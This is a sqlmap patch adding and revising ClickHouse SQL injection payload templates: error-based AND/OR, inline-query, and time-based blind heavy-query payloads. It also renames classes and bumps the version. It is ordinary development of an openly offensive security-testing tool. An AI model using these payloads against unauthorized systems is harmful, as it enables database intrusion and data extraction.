From 30ba167cc1506fa6531c84383428d5bb30d81412 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 3 Feb 2023 23:56:50 +0100 Subject: [PATCH] Some more fixes related to ClickHouse support (#5229) --- data/xml/errors.xml | 5 +++-- data/xml/payloads/error_based.xml | 32 ++++++++++++++++++++++------- data/xml/payloads/inline_query.xml | 10 ++++----- data/xml/payloads/time_blind.xml | 26 +++++++++++++++++++---- data/xml/queries.xml | 4 ++-- lib/controller/handler.py | 6 +++--- lib/core/settings.py | 2 +- plugins/dbms/clickhouse/__init__.py | 2 +- 8 files changed, 62 insertions(+), 25 deletions(-) diff --git a/data/xml/errors.xml b/data/xml/errors.xml index b78dd91c6..4993a8ae8 100644 --- a/data/xml/errors.xml +++ b/data/xml/errors.xml @@ -211,8 +211,9 @@ - - + + + diff --git a/data/xml/payloads/error_based.xml b/data/xml/payloads/error_based.xml index 6cc089d09..9b1d2725f 100644 --- a/data/xml/payloads/error_based.xml +++ b/data/xml/payloads/error_based.xml @@ -838,7 +838,7 @@ IBM DB2 OR error-based - WHERE or HAVING clause 2 4 - 1 + 3 1 1 OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') @@ -853,23 +853,41 @@ - - Clickhouse AND error-based - Parameter replace + ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause 2 - 2 + 3 1 1,2,3,9 1 - AND [RANDNUM]=CAST('[DELIMITER_START]'||CAST(([QUERY]), 'String')||'[DELIMITER_STOP]' AS String) + AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]') - AND [RANDNUM]=CAST('[DELIMITER_START]'||CAST((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)), 'String')||'[DELIMITER_STOP]' AS String) + AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]') [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
- Clickhouse + ClickHouse +
+
+ + + ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause + 2 + 4 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]') + + OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ ClickHouse
diff --git a/data/xml/payloads/inline_query.xml b/data/xml/payloads/inline_query.xml index 8e3b91f70..7269be695 100644 --- a/data/xml/payloads/inline_query.xml +++ b/data/xml/payloads/inline_query.xml @@ -135,21 +135,21 @@ - Clickhouse inline queries + ClickHouse inline queries 3 - 2 + 3 1 1,2,3,8 3 - (SELECT '[DELIMITER_START]'||CAST(([QUERY]), 'String')||'[DELIMITER_STOP]') + ('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]') - (SELECT '[DELIMITER_START]'||CAST((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)), 'String')||'[DELIMITER_STOP]') + ('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]') [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
- Clickhouse + ClickHouse
diff --git a/data/xml/payloads/time_blind.xml b/data/xml/payloads/time_blind.xml index 944ec8008..5de31ec45 100644 --- a/data/xml/payloads/time_blind.xml +++ b/data/xml/payloads/time_blind.xml @@ -1494,12 +1494,30 @@ + + ClickHouse AND time-based blind (heavy query) + 5 + 4 + 1 + 1,2,3 + 1 + AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1))) + + AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000)) + + + + +
+ ClickHouse +
+
- Clickhouse AND time-based blind (heavy query) - fuzzBits + ClickHouse OR time-based blind (heavy query) 5 - 3 - 1 + 5 + 3 1,2,3 1 OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1))) @@ -1510,7 +1528,7 @@
- Clickhouse + ClickHouse
diff --git a/data/xml/queries.xml b/data/xml/queries.xml index 82570ce7e..a3e006ccb 100644 --- a/data/xml/queries.xml +++ b/data/xml/queries.xml @@ -1319,7 +1319,7 @@
- +
@@ -1331,7 +1331,7 @@ - +
diff --git a/lib/controller/handler.py b/lib/controller/handler.py
index 0e3c1999f..1c4994e84 100644
--- a/lib/controller/handler.py
+++ b/lib/controller/handler.py
@@ -47,8 +47,8 @@ from plugins.dbms.altibase.connector import Connector as AltibaseConn
 from plugins.dbms.altibase import AltibaseMap
 from plugins.dbms.cache.connector import Connector as CacheConn
 from plugins.dbms.cache import CacheMap
-from plugins.dbms.clickhouse.connector import Connector as ClickhouseConn
-from plugins.dbms.clickhouse import ClickhouseMap
+from plugins.dbms.clickhouse.connector import Connector as ClickHouseConn
+from plugins.dbms.clickhouse import ClickHouseMap
 from plugins.dbms.cratedb.connector import Connector as CrateDBConn
 from plugins.dbms.cratedb import CrateDBMap
 from plugins.dbms.cubrid.connector import Connector as CubridConn
@@ -125,7 +125,7 @@ def setHandler():
 (DBMS.PRESTO, PRESTO_ALIASES, PrestoMap, PrestoConn),
 (DBMS.ALTIBASE, ALTIBASE_ALIASES, AltibaseMap, AltibaseConn),
 (DBMS.MIMERSQL, MIMERSQL_ALIASES, MimerSQLMap, MimerSQLConn),
- (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES, ClickhouseMap, ClickhouseConn),
+ (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES, ClickHouseMap, ClickHouseConn),
 (DBMS.CRATEDB, CRATEDB_ALIASES, CrateDBMap, CrateDBConn),
 (DBMS.CUBRID, CUBRID_ALIASES, CubridMap, CubridConn),
 (DBMS.CACHE, CACHE_ALIASES, CacheMap, CacheConn),
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 4009d625c..9d224253a 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -20,7 +20,7 @@ from thirdparty import six
 from thirdparty.six import unichr as _unichr
 # sqlmap version (...)
-VERSION = "1.7.2.2"
+VERSION = "1.7.2.3"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/plugins/dbms/clickhouse/__init__.py b/plugins/dbms/clickhouse/__init__.py
index 873a0bb1b..a4a131442 100755
--- a/plugins/dbms/clickhouse/__init__.py
+++ b/plugins/dbms/clickhouse/__init__.py
@@ -16,7 +16,7 @@ from plugins.dbms.clickhouse.syntax import Syntax
 from plugins.dbms.clickhouse.takeover import Takeover
 from plugins.generic.misc import Miscellaneous
-class ClickhouseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
+class ClickHouseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
 """
 This class defines ClickHouse methods
 """